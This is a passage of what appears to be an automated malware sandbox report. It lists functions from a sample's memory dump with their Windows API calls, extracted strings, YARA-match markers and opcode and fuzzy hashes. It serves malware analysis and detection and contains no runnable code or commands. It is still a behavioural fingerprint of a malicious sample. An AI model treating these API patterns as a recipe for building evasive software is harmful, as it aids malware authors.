                                                                                                            • Opcode Fuzzy Hash: 4f06464f171db7dfd99c1a611f433d184ec53262f360102c0d624b4100b6e755
                                                                                                            • Instruction Fuzzy Hash: C6F0E7B6600108ABCB14DF99DC81EEB77A9EF9C354F118258FA1DA7241DA30E811CBA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00418280, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36filenativeCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,!:A,FFFFFFFF,?,b=A,?,00000000), ref: 004182C5
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.597396860.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FileRead
                                                                                                            • String ID: !:A
                                                                                                            • API String ID: 2738559852-3803994810
                                                                                                            • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                                            • Instruction ID: 51f5fae1d88b5840d166f8ea9f31b1482cd02544441b85bb92b9de754d914906
                                                                                                            • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                                            • Instruction Fuzzy Hash: F0F0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158249BA1D97241DA30E8518BA4
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00418300, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20nativeCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • NtClose.NTDLL(@=A,?,?,00413D40,00000000,FFFFFFFF), ref: 00418325
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.597396860.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Close
                                                                                                            • String ID: @=A
                                                                                                            • API String ID: 3535843008-3840437610
                                                                                                            • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                            • Instruction ID: e0948211a995ee673693cff6b37ba25287d5fac55aefcf59dfc2265e20a22c74
                                                                                                            • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                            • Instruction Fuzzy Hash: EAD012752003146BD710EF99DC45ED7775CEF44750F154559BA185B282C570F90086E0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 004183AB, Relevance: 1.5, APIs: 1, Instructions: 32memorynativeCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00402D11,00002000,00003000,00000004), ref: 004183E9
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.597396860.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AllocateMemoryVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 2167126740-0
                                                                                                            • Opcode ID: 0dce1c64bda30577b5c58f5140c662771335f0adec20b33251f668859a7dbef2
                                                                                                            • Instruction ID: 3679ede50116ae23d234e94d74696cb06d5389d83a42e90e6644c665e332e4af
                                                                                                            • Opcode Fuzzy Hash: 0dce1c64bda30577b5c58f5140c662771335f0adec20b33251f668859a7dbef2
                                                                                                            • Instruction Fuzzy Hash: 16F0F8B2204218AFCB14DF89DC91EEB77A9AF88754F15815DFE0897281C670E811CBE4
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 004183B0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00402D11,00002000,00003000,00000004), ref: 004183E9
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.597396860.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AllocateMemoryVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 2167126740-0
                                                                                                            • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                                            • Instruction ID: 5f1ba135279249ad747bfdca3347611d303f78695a7cb9da664d5d0d2719559c
                                                                                                            • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                                            • Instruction Fuzzy Hash: 4EF015B2200208ABCB14DF89DC81EEB77ADAF88754F118249BE0897281C630F810CBA4
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00B79860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.598216029.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                                            • Associated: 0000000B.00000002.598444470.0000000000C2B000.00000040.00000001.sdmp Download File
                                                                                                            • Associated: 0000000B.00000002.598457171.0000000000C2F000.00000040.00000001.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID:
                                                                                                            • API String ID: 2994545307-0
                                                                                                            • Opcode ID: b5647efba6d676840afa7f96a2592fcbb5a5f32453c1683b2fec89ba688679c8
                                                                                                            • Instruction ID: 9eb69281b6446c6de08db11e229d61495eb594aaeebd43d1ec186b184904c664
                                                                                                            • Opcode Fuzzy Hash: b5647efba6d676840afa7f96a2592fcbb5a5f32453c1683b2fec89ba688679c8
                                                                                                            • Instruction Fuzzy Hash: CC90027220100413D21171598504B070149D7D0381F91C467E041455DD96968962F661
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00B79840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.598216029.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                                            • Associated: 0000000B.00000002.598444470.0000000000C2B000.00000040.00000001.sdmp Download File
                                                                                                            • Associated: 0000000B.00000002.598457171.0000000000C2F000.00000040.00000001.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID:
                                                                                                            • API String ID: 2994545307-0
                                                                                                            • Opcode ID: 5b949a19c827e6458daa5f7621982979fd964dba8ec9d4682b4cea93ed94a844
                                                                                                            • Instruction ID: 061872587d756b2b6a952fbf2d087fccdd503f372d0caeb2b6caf3e5c4033e98
                                                                                                            • Opcode Fuzzy Hash: 5b949a19c827e6458daa5f7621982979fd964dba8ec9d4682b4cea93ed94a844
                                                                                                            • Instruction Fuzzy Hash: 05900262242041525645B15984049074146E7E0381791C067E1404955C85669866EB61
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00B799A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.598216029.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                                            • Associated: 0000000B.00000002.598444470.0000000000C2B000.00000040.00000001.sdmp Download File
                                                                                                            • Associated: 0000000B.00000002.598457171.0000000000C2F000.00000040.00000001.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID:
                                                                                                            • API String ID: 2994545307-0
                                                                                                            • Opcode ID: 0343115eb501028d1ce02005338e7a7fa97d06521c12dcdbd6a8b61c2883b6f9
                                                                                                            • Instruction ID: 9da24e97d4b011f738d8982c3ce8b730d900356ba9609f783baa97114112606c
                                                                                                            • Opcode Fuzzy Hash: 0343115eb501028d1ce02005338e7a7fa97d06521c12dcdbd6a8b61c2883b6f9
                                                                                                            • Instruction Fuzzy Hash: FF9002A234100442D20071598414F060145D7E1341F51C06AE1054559D8659CC62F666
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00B795D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.598216029.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                                            • Associated: 0000000B.00000002.598444470.0000000000C2B000.00000040.00000001.sdmp Download File
                                                                                                            • Associated: 0000000B.00000002.598457171.0000000000C2F000.00000040.00000001.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID:
                                                                                                            • API String ID: 2994545307-0
                                                                                                            • Opcode ID: 5ad1840c76811aa117efdd754b4724a100c2af2d38dab46594ef5759b7fb1f3a
                                                                                                            • Instruction ID: 56603ca9c53d385a80cf7bb611a13209602c8ba3b1bdc73bcc36e00c41e33fa9
                                                                                                            • Opcode Fuzzy Hash: 5ad1840c76811aa117efdd754b4724a100c2af2d38dab46594ef5759b7fb1f3a
                                                                                                            • Instruction Fuzzy Hash: 3B9002A220200003420571598414A16414AD7E0341B51C076E1004595DC56588A1F665
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00B79910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.598216029.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                                            • Associated: 0000000B.00000002.598444470.0000000000C2B000.00000040.00000001.sdmp Download File
                                                                                                            • Associated: 0000000B.00000002.598457171.0000000000C2F000.00000040.00000001.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID:
                                                                                                            • API String ID: 2994545307-0
                                                                                                            • Opcode ID: 6fab2b7e926b4072c7597eb4ef3affbf7d48e57440592511295b9aeaf8f70768
                                                                                                            • Instruction ID: 90f86da2c744b51d0b1490cbf77feee4780841c83c4da16e7610f395fe283644
                                                                                                            • Opcode Fuzzy Hash: 6fab2b7e926b4072c7597eb4ef3affbf7d48e57440592511295b9aeaf8f70768
                                                                                                            • Instruction Fuzzy Hash: 6E9002B220100402D24071598404B460145D7D0341F51C066E5054559E86998DE5FBA5
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00B79540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.598216029.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                                            • Associated: 0000000B.00000002.598444470.0000000000C2B000.00000040.00000001.sdmp Download File
                                                                                                            • Associated: 0000000B.00000002.598457171.0000000000C2F000.00000040.00000001.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID:
                                                                                                            • API String ID: 2994545307-0
                                                                                                            • Opcode ID: 909d3b5a9e48934d2f9cd680104ece8b66dfbc1b8a3d597d612f7c160fe0170b
                                                                                                            • Instruction ID: c9a959d7522151d9d0f6a705b83cb645f0f23cf5b46546335af526c168ccb99c
                                                                                                            • Opcode Fuzzy Hash: 909d3b5a9e48934d2f9cd680104ece8b66dfbc1b8a3d597d612f7c160fe0170b
                                                                                                            • Instruction Fuzzy Hash: A9900266211000030205B55947049070186D7D5391351C076F1005555CD6618871E661
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00B796E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.598216029.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                                            • Associated: 0000000B.00000002.598444470.0000000000C2B000.00000040.00000001.sdmp Download File
                                                                                                            • Associated: 0000000B.00000002.598457171.0000000000C2F000.00000040.00000001.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID:
                                                                                                            • API String ID: 2994545307-0
                                                                                                            • Opcode ID: b0856fe86f9d909fafbf37032993a2251b2e451fc86639fe0971f2d549a47ea6
                                                                                                            • Instruction ID: e16c3bbb2738a46380d85e3196ee5a816bcb28d37a777420db30898e17dc07bf
                                                                                                            • Opcode Fuzzy Hash: b0856fe86f9d909fafbf37032993a2251b2e451fc86639fe0971f2d549a47ea6
                                                                                                            • Instruction Fuzzy Hash: 6690027220108802D2107159C404B4A0145D7D0341F55C466E441465DD86D588A1F661
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00B796D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.598216029.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                                            • Associated: 0000000B.00000002.598444470.0000000000C2B000.00000040.00000001.sdmp Download File
                                                                                                            • Associated: 0000000B.00000002.598457171.0000000000C2F000.00000040.00000001.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID:
                                                                                                            • API String ID: 2994545307-0
                                                                                                            • Opcode ID: 0d2d39294e962a940265c8cb1d250ff08b250474bc80130c146ddca644c8e95e
                                                                                                            • Instruction ID: 2b3a7d4470e927c5b8e4605e76a40f80773cba7b26c722739e530fc170ac57e7
                                                                                                            • Opcode Fuzzy Hash: 0d2d39294e962a940265c8cb1d250ff08b250474bc80130c146ddca644c8e95e
                                                                                                            • Instruction Fuzzy Hash: 6E90027220100842D20071598404F460145D7E0341F51C06BE0114659D8655C861FA61
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00B79660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.598216029.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                                            • Associated: 0000000B.00000002.598444470.0000000000C2B000.00000040.00000001.sdmp Download File
                                                                                                            • Associated: 0000000B.00000002.598457171.0000000000C2F000.00000040.00000001.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID:
                                                                                                            • API String ID: 2994545307-0
                                                                                                            • Opcode ID: b904b9b8ed6beadf4652ab7e58c1b46eff4bd18cd81736f9d23bb31898439474
                                                                                                            • Instruction ID: b2f3d2a66bee0d2f2452ac2e74e391c4f59afcd1ac0cc30fb83436a946d8b7ad
                                                                                                            • Opcode Fuzzy Hash: b904b9b8ed6beadf4652ab7e58c1b46eff4bd18cd81736f9d23bb31898439474
                                                                                                            • Instruction Fuzzy Hash: FF90027220100802D28071598404A4A0145D7D1341F91C06AE0015659DCA558A69FBE1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00B79650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.598216029.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                                            • Associated: 0000000B.00000002.598444470.0000000000C2B000.00000040.00000001.sdmp Download File
                                                                                                            • Associated: 0000000B.00000002.598457171.0000000000C2F000.00000040.00000001.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID:
                                                                                                            • API String ID: 2994545307-0
                                                                                                            • Opcode ID: 1f23d05395b891c108110ab10dfe98d2a7a79cd6ea43517ce68d480451eb5b3b
                                                                                                            • Instruction ID: e665d327315db27d1d0d5b132f67013959f6fb2a9bfa7e05615000572b330870
                                                                                                            • Opcode Fuzzy Hash: 1f23d05395b891c108110ab10dfe98d2a7a79cd6ea43517ce68d480451eb5b3b
                                                                                                            • Instruction Fuzzy Hash: 1790027220504842D24071598404E460155D7D0345F51C066E0054699D96658D65FBA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00B79A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.598216029.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                                            • Associated: 0000000B.00000002.598444470.0000000000C2B000.00000040.00000001.sdmp Download File
                                                                                                            • Associated: 0000000B.00000002.598457171.0000000000C2F000.00000040.00000001.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID:
                                                                                                            • API String ID: 2994545307-0
                                                                                                            • Opcode ID: da7a2fdaaae53ca40e7fdc202c5f7ee796165d655eaaa3b53b29fbe842dfb4f1
                                                                                                            • Instruction ID: 85431d05685d319fed4f690c07b426bd3616a5f4e68691619912fc76efab5d9e
                                                                                                            • Opcode Fuzzy Hash: da7a2fdaaae53ca40e7fdc202c5f7ee796165d655eaaa3b53b29fbe842dfb4f1
                                                                                                            • Instruction Fuzzy Hash: 3990026221180042D30075698C14F070145D7D0343F51C16AE0144559CC9558871EA61
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00B79780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.598216029.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                                            • Associated: 0000000B.00000002.598444470.0000000000C2B000.00000040.00000001.sdmp Download File
                                                                                                            • Associated: 0000000B.00000002.598457171.0000000000C2F000.00000040.00000001.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID:
                                                                                                            • API String ID: 2994545307-0
                                                                                                            • Opcode ID: ae34870d37ac1b19feb61773375b2c676122b9d9d7cc4f8fcd330a860eae01c4
                                                                                                            • Instruction ID: 5dfa6c933f30dd59c5b9af5b6a2e73c4648d4bf628751f84d45324630e55fc66
                                                                                                            • Opcode Fuzzy Hash: ae34870d37ac1b19feb61773375b2c676122b9d9d7cc4f8fcd330a860eae01c4
                                                                                                            • Instruction Fuzzy Hash: C790026A21300002D28071599408A0A0145D7D1342F91D46AE000555DCC9558879E761
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00B79FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.598216029.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                                            • Associated: 0000000B.00000002.598444470.0000000000C2B000.00000040.00000001.sdmp Download File
                                                                                                            • Associated: 0000000B.00000002.598457171.0000000000C2F000.00000040.00000001.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID:
                                                                                                            • API String ID: 2994545307-0
                                                                                                            • Opcode ID: 7773cfefede6284dbba26a2246fbe1e1a43980012409739214e851d7602aba7a
                                                                                                            • Instruction ID: 29132c593c4d79ab0d172ace2f5a2d920761199e7903d005f506627bf1baeec3
                                                                                                            • Opcode Fuzzy Hash: 7773cfefede6284dbba26a2246fbe1e1a43980012409739214e851d7602aba7a
                                                                                                            • Instruction Fuzzy Hash: 2890027231114402D2107159C404B060145D7D1341F51C466E081455DD86D588A1F662
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00B79710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.598216029.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                                            • Associated: 0000000B.00000002.598444470.0000000000C2B000.00000040.00000001.sdmp Download File
                                                                                                            • Associated: 0000000B.00000002.598457171.0000000000C2F000.00000040.00000001.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID:
                                                                                                            • API String ID: 2994545307-0
                                                                                                            • Opcode ID: 2885fe68a636094b4e3d80c6dc69f338cf54639e6412c4a6ba0fa16259e8f640
                                                                                                            • Instruction ID: fa01ffcd26241440f0f1d8948560431c01da16209a912eac58e2da253c2b16f3
                                                                                                            • Opcode Fuzzy Hash: 2885fe68a636094b4e3d80c6dc69f338cf54639e6412c4a6ba0fa16259e8f640
                                                                                                            • Instruction Fuzzy Hash: 3E90027220100402D20075999408A460145D7E0341F51D066E501455AEC6A588A1F671
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00416EF0, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • Sleep.KERNELBASE(000007D0), ref: 00416F98
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.597396860.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Sleep
                                                                                                            • String ID: net.dll$wininet.dll
                                                                                                            • API String ID: 3472027048-1269752229
                                                                                                            • Opcode ID: c6d6aff95df4aad3e34fd8c98b1bcbb2562515a8b3fc70b74da18bdfb62c2152
                                                                                                            • Instruction ID: 5114a80e475be90adbc8469d63105e0b4cb5826b3d33b4e062b9cdd19719e6f4
                                                                                                            • Opcode Fuzzy Hash: c6d6aff95df4aad3e34fd8c98b1bcbb2562515a8b3fc70b74da18bdfb62c2152
                                                                                                            • Instruction Fuzzy Hash: 8E318FB1601304ABD711DF65D8A1FA7B7F8BB88704F00841EF61AAB241D734B985CBE5
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00416EE7, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 80sleepCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • Sleep.KERNELBASE(000007D0), ref: 00416F98
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.597396860.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Sleep
                                                                                                            • String ID: net.dll$wininet.dll
                                                                                                            • API String ID: 3472027048-1269752229
                                                                                                            • Opcode ID: e583e252b6f5ddf92ebaed3d35bf597ccee48b2ce8a1837df6ab8006b1404479
                                                                                                            • Instruction ID: 451f02053e719c34ae6212d34628ba0db74968d8eb1d9f3ad69266e51dec3750
                                                                                                            • Opcode Fuzzy Hash: e583e252b6f5ddf92ebaed3d35bf597ccee48b2ce8a1837df6ab8006b1404479
                                                                                                            • Instruction Fuzzy Hash: 9F219EB1605305ABD711DF65C8A1FA7BBB4FB88704F10806EF6196B241D378B885CBE5
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00417013, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0040CCE0,?,?), ref: 0041705C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.597396860.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CreateThread
                                                                                                            • String ID: {,`_
                                                                                                            • API String ID: 2422867632-839147719
                                                                                                            • Opcode ID: 9dfb60658e71a7dafc987092f7051f52a1fd21ef20e2736b5179ff9b5a5a1669
                                                                                                            • Instruction ID: be959b8ddb8f57902cf74467a6ebf4d5b1c9a070b152a969053aa66e22f22f03
                                                                                                            • Opcode Fuzzy Hash: 9dfb60658e71a7dafc987092f7051f52a1fd21ef20e2736b5179ff9b5a5a1669
                                                                                                            • Instruction Fuzzy Hash: 14F09B767C030036E230655DDC43FE776688F94F34F14011AF759AB2C1D599F98246AC
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 004184D2, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 26memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00403B93), ref: 0041850D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.597396860.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FreeHeap
                                                                                                            • String ID: .z`
                                                                                                            • API String ID: 3298025750-1441809116
                                                                                                            • Opcode ID: 29d648da0dfa36d9a9a8b517bcd256247363778c7d3b21846dbe6b0703062777
                                                                                                            • Instruction ID: 6779f3412cf1ea62c4e4a45f5f4d75c74c39be4ea27dbf5a0490146149385879
                                                                                                            • Opcode Fuzzy Hash: 29d648da0dfa36d9a9a8b517bcd256247363778c7d3b21846dbe6b0703062777
                                                                                                            • Instruction Fuzzy Hash: A5E022B82142459FD714EF29E8808AB7390FFD1348B144A8EE88847306C231C429CB71
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 004184E0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00403B93), ref: 0041850D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.597396860.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FreeHeap
                                                                                                            • String ID: .z`
                                                                                                            • API String ID: 3298025750-1441809116
                                                                                                            • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                                            • Instruction ID: 3ff41463f96ddcb9b979ffb1c010e7f29050f08b507ceaebb1b5cb1da4dac703
                                                                                                            • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                                            • Instruction Fuzzy Hash: A0E01AB12002086BD714DF59DC45EA777ACAF88750F014559B90857281C630E9108AB0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 004184A0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlAllocateHeap.NTDLL(&5A,?,00413C9F,00413C9F,?,00413526,?,?,?,?,?,00000000,00000000,?), ref: 004184CD
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.597396860.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AllocateHeap
                                                                                                            • String ID: &5A
                                                                                                            • API String ID: 1279760036-1617645808
                                                                                                            • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                                            • Instruction ID: 6eed1dfa6fdd4b996c8079955bb5808ea645f65af4e2973490dba1d49a230398
                                                                                                            • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                                            • Instruction Fuzzy Hash: 94E012B1200208ABDB14EF99DC41EA777ACAF88654F118559BA085B282CA30F9108AB0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00407270, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 004072CA
                                                                                                            • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 004072EB
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.597396860.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: MessagePostThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 1836367815-0
